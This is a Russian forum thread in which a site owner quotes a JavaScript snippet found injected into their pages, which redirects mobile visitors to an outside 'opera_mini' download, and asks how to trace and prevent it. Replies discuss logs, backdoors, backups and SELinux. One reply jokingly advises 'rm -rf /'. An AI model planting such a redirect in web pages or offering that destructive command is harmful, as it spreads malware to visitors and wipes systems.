LINUX.ORG.RU

Где искаять уязвимость?


1

2

Доброго времени суток! Недавно у меня в проектах я обнаружил странный скрипт. <script type=«text/javascript»> <!-- if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone)/i)!==null){ window.location = "http://filetrust.net/opera_mini/3627/opera_mini.auto"; } //--> </script>

http://habrahabr.ru/post/137578/ - здесь я узнал про него.

Сталкивался ли кто-то с такой проблемой? Как можно узнать откуда появилась? И как себя обезопасить себя от этого в будущем?

Перемещено maxcom из admin

rm -rf /

Потом заново ставишь систему. Потом не используешь левые ppa. И читаешь мануал прежде чем что-то делать.

alpha3
()

если у тебя есть какой-нибудь WordPress или что-то подобное на пхп - то это попало через уязвимость в нем. Смотри логи, скорее всего у тебя еще остался бэкдор.

xpahos ★★★★★
()

Как можно узнать откуда появилась?

Читать логи, думать.

И как себя обезопасить себя от этого в будущем?

Зависит от результата предыдущего действия.

AS ★★★★★
()

отследи время когда тебя взломали. на сайтике повесь табличку: «ведуться работы». откатись на бэкап до взлома и попытайся исправить уязвимость. если не могешь найти и хочешь обезопасится - включи selinux и настрой права для веб сервера хорошенько

punya ★★
()
Ответ на: комментарий от punya

с selinux твой сайт конечно смогут опять взломать но бэкдор не повесят. и уже отталкиваясь от этого ты можешь расставлять ловушку на ломателя

punya ★★
()
Ответ на: комментарий от leave

ломают через веб в 99% случаев.

Или ftp, если по фтп данные заливаются. Причём не ломают даже, а трояном тянут сохранённые пароли с виндовых рабочих станций и используют. Собственно, могут и не по ftp, наверное, при этом раскладе.

AS ★★★★★
()
Ответ на: комментарий от punya

была масса ядерных сплойтов с обходом selinux, так что это не панацея

xtraeft ★★☆☆
()
Ответ на: комментарий от xtraeft

если хороший бэкдор получил рута то он наложит своего кода во все системные утилиты и вычистить без заливки старого бэкапа будет геморой

ядерных сплойтов с обходом selinux

лично я не видал. в любом случае с selinux защиты побольше

punya ★★
()
Ответ на: комментарий от punya

до поднятия прав мы еще не дошли, для начала достаточно веб шелл найти и удалить

лично я не видал.

sock_sendpage, abftw.c хотя бы

xtraeft ★★☆☆
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.